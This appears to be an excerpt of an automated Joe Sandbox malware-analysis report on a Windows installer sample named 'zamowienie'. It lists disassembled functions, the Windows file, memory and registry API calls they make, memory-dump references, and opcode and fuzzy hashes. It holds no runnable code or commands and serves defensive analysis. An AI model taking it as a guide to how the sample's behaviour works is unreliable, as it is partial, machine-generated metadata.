                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 533cdbfa14bd46aff5f077cc379c2afb520a9fdfce67048ae7eb31f5ce05fb96
                                                                                                                                              • Instruction ID: c33c5666af6c75f79320ec07ff6f5d84745bcd66e348b55f4a383563786f3f76
                                                                                                                                              • Opcode Fuzzy Hash: 533cdbfa14bd46aff5f077cc379c2afb520a9fdfce67048ae7eb31f5ce05fb96
                                                                                                                                              • Instruction Fuzzy Hash: 55A15530E04229CBDF28CFA8C854AADBBB1FF45305F14816ED856BB281C7786986DF45
                                                                                                                                              Function 00407110 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b0e7892fc0148d1df718cb7c8fd9528a9bb79f163078764c2ef1885efcb3e637
                                                                                                                                              • Instruction ID: bfcacfd1e6dfbf0b51447c073d542a0936cacb146dbcb40dbfdc372d719c54c7
                                                                                                                                              • Opcode Fuzzy Hash: b0e7892fc0148d1df718cb7c8fd9528a9bb79f163078764c2ef1885efcb3e637
                                                                                                                                              • Instruction Fuzzy Hash: F5912270E04228CBEF28CF98C854BADBBB1FB45305F14816ED852BB291C7786986DF45
                                                                                                                                              Function 00406E26 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 30c48504e0d06fa89971e82566f802308b9b6acf89f411add0b829b56a0d24bf
                                                                                                                                              • Instruction ID: b46ce3aaeeaae7999688ccec5f61ab74ced10a1bc504861f5df006c548d955ef
                                                                                                                                              • Opcode Fuzzy Hash: 30c48504e0d06fa89971e82566f802308b9b6acf89f411add0b829b56a0d24bf
                                                                                                                                              • Instruction Fuzzy Hash: 2F816571E04228DFDF28CFA8C844BADBBB1FB45305F24816AD816BB291C7785986DF45
                                                                                                                                              Function 0040692B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f5f944b03c02af6c76795726ac7589d59d860d35433a8700b0fb93e92ad0fe46
                                                                                                                                              • Instruction ID: 1e33e26d9dce91bb097f2c8bff4565a5e1bf79719f9bb8ed50b812f2e35dede4
                                                                                                                                              • Opcode Fuzzy Hash: f5f944b03c02af6c76795726ac7589d59d860d35433a8700b0fb93e92ad0fe46
                                                                                                                                              • Instruction Fuzzy Hash: 1A814971D04228DFEF28CFA9C844BADBBB1FB45305F10816AD856BB281C7786986DF45
                                                                                                                                              Function 00406D79 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2ef3f85870024d470c8a0da60846c16bf2671b2d472f8d7f34595ad5217740a2
                                                                                                                                              • Instruction ID: d38b3cf05b03e04177f9a977791ddf84bc2d83941fd0effd4bd8429f63ce2606
                                                                                                                                              • Opcode Fuzzy Hash: 2ef3f85870024d470c8a0da60846c16bf2671b2d472f8d7f34595ad5217740a2
                                                                                                                                              • Instruction Fuzzy Hash: 7E713371E04228DFDF28CFA8C844BADBBB1FB45305F15806AD806BB280C7786996DF45
                                                                                                                                              Function 00406E97 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 795b6a3fea9fe7067310eedd8c4c79333a503bce10d96aefb73cc791e97251d0
                                                                                                                                              • Instruction ID: fc5e0c43512693518b8d25b91e1320d1306faf28b58cc3f2b62074dc6fc36a6d
                                                                                                                                              • Opcode Fuzzy Hash: 795b6a3fea9fe7067310eedd8c4c79333a503bce10d96aefb73cc791e97251d0
                                                                                                                                              • Instruction Fuzzy Hash: 7F713571E04228DFDF28CFA8C844BADBBB1FB45305F15806AD806BB290C7786996DF45
                                                                                                                                              Function 00406DE3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5006835e7e5482f4fd56c3c81770ac229a7fa0391a7813b55dc3d2701049468c
                                                                                                                                              • Instruction ID: 82bb1164469d795e3f7c6a220d361996e600ca7c4c41c8c4d6b9e8afedc888b9
                                                                                                                                              • Opcode Fuzzy Hash: 5006835e7e5482f4fd56c3c81770ac229a7fa0391a7813b55dc3d2701049468c
                                                                                                                                              • Instruction Fuzzy Hash: 06714471E04228DFEF28CF98C844BADBBB1FB45305F11806AD812BB291C7786996DF45
                                                                                                                                              Function 0040332A Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040333E
                                                                                                                                                • Part of subcall function 004034A9: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004031A7,?), ref: 004034B7
                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403254,00000004,00000000,00000000,?,?,004031CE,000000FF,00000000,00000000,0000000A,?), ref: 00403371
                                                                                                                                              • SetFilePointer.KERNELBASE(00003C4C,00000000,00000000,004138F8,00004000,?,00000000,00403254,00000004,00000000,00000000,?,?,004031CE,000000FF,00000000), ref: 0040346C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1092082344-0
                                                                                                                                              • Opcode ID: 798ae4cb807969a8f9b20dbfb01d8f4788347d3a684976bc915bde066e73c198
                                                                                                                                              • Instruction ID: 09af1e540d44bbd2416a0043bcd619451adf099d21c07ac7e0c40e623a241f61
                                                                                                                                              • Opcode Fuzzy Hash: 798ae4cb807969a8f9b20dbfb01d8f4788347d3a684976bc915bde066e73c198
                                                                                                                                              • Instruction Fuzzy Hash: 02319E725002059FD711EF2AEE849663BACE741356324C13BE914B72F0C73859459FAD
                                                                                                                                              Function 00401BAC Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GlobalFree.KERNELBASE(008CDF88), ref: 00401C1B
                                                                                                                                              • GlobalAlloc.KERNELBASE(?,00000404), ref: 00401C2D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                              • String ID: Call
                                                                                                                                              • API String ID: 3394109436-1824292864
                                                                                                                                              • Opcode ID: aa701864cc167322a4de3615b2c45705665432ba8c04fa7264157eb7733f1294
                                                                                                                                              • Instruction ID: fab91ba1c69eb5a6519599a2f087e3d36e040df921b275c240dda4b4e9808546
                                                                                                                                              • Opcode Fuzzy Hash: aa701864cc167322a4de3615b2c45705665432ba8c04fa7264157eb7733f1294
                                                                                                                                              • Instruction Fuzzy Hash: 742196726001189BDB20FBA5CEC4A5E73EDEB44314711453BF602B72E1DBBC98119B9D
                                                                                                                                              Function 004025B5 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                                                                                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000000,00000011,00000002), ref: 00402612
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Enum$CloseValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 397863658-0
                                                                                                                                              • Opcode ID: 230ad6ed1b2d12a176fa8cab1164844e28371dc3800414125af3d0e4da1b4f47
                                                                                                                                              • Instruction ID: 2fdce73ad085c62472bd830a98c17d777de9cb50a685b990e8c01797d1551d9d
                                                                                                                                              • Opcode Fuzzy Hash: 230ad6ed1b2d12a176fa8cab1164844e28371dc3800414125af3d0e4da1b4f47
                                                                                                                                              • Instruction Fuzzy Hash: E5017C71605204AFEB258F54DE98ABF7AACEF40358F10443FF445A61C0DAB94A419A29
                                                                                                                                              Function 00403222 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,?,?,004031CE,000000FF,00000000,00000000,0000000A,?), ref: 00403247
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: 30e242b14a2b822041ab8f12606bbed43d081868df01e651b14b32d607499233
                                                                                                                                              • Instruction ID: 4e31b0a15d460e82a6868dcc7a97c97f9d71def9209fb78f02f37c604352801e
                                                                                                                                              • Opcode Fuzzy Hash: 30e242b14a2b822041ab8f12606bbed43d081868df01e651b14b32d607499233
                                                                                                                                              • Instruction Fuzzy Hash: 70319F3010021AFFDB10DF96ED85A9E3FA8EB04355B20803AF914E6190DB38DF519BA9
                                                                                                                                              Function 00402543 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402573
                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000000,00000011,00000002), ref: 00402612
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                              • Opcode ID: f341fab6c4d5d9e143f9a39c8857dafa6d1c3b959e35e13e3f3f87eeb1339b35
                                                                                                                                              • Instruction ID: 27f22e72776e534b7518d78bf4125aa2de7fa147ee0fcb7e23e1e5dcbb4dd508
                                                                                                                                              • Opcode Fuzzy Hash: f341fab6c4d5d9e143f9a39c8857dafa6d1c3b959e35e13e3f3f87eeb1339b35
                                                                                                                                              • Instruction Fuzzy Hash: 6011E371905205EFDF20CF60CA985AE7BB4EF41344F20883FE442B72C0D6B98A45DB2A
                                                                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: 0c5789fd138260514d082d02416d4df913b42f9f9632ac62ea02531d6497fcc4
                                                                                                                                              • Instruction ID: f90f8baee40fd2ad2ebd870fe85d102dfcd66f1b25247bd42a8a5a06ccf829ae
                                                                                                                                              • Opcode Fuzzy Hash: 0c5789fd138260514d082d02416d4df913b42f9f9632ac62ea02531d6497fcc4
                                                                                                                                              • Instruction Fuzzy Hash: 2101F4317202109BE7295F389D04B2A36A8E714315F10823FF895F61F1DA78DC038B4D
                                                                                                                                              Function 0040244E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseDeleteValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2831762973-0
                                                                                                                                              • Opcode ID: 7a7d4ca3cf7b68813273955a19fe3f7db77441c35217859e8440f37874624791
                                                                                                                                              • Instruction ID: e1f05abede15ecbb2c146e6edb2cb91af218c767d3863478ae3f90e70a82c0a4
                                                                                                                                              • Opcode Fuzzy Hash: 7a7d4ca3cf7b68813273955a19fe3f7db77441c35217859e8440f37874624791
                                                                                                                                              • Instruction Fuzzy Hash: 03F0BB32A04121ABEB60EBA49F4DABE72A99B40315F25003FF501B71C1D9F84E42866E
                                                                                                                                              Function 004059C8 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,?), ref: 00405A0A
                                                                                                                                              • GetLastError.KERNEL32 ref: 00405A18
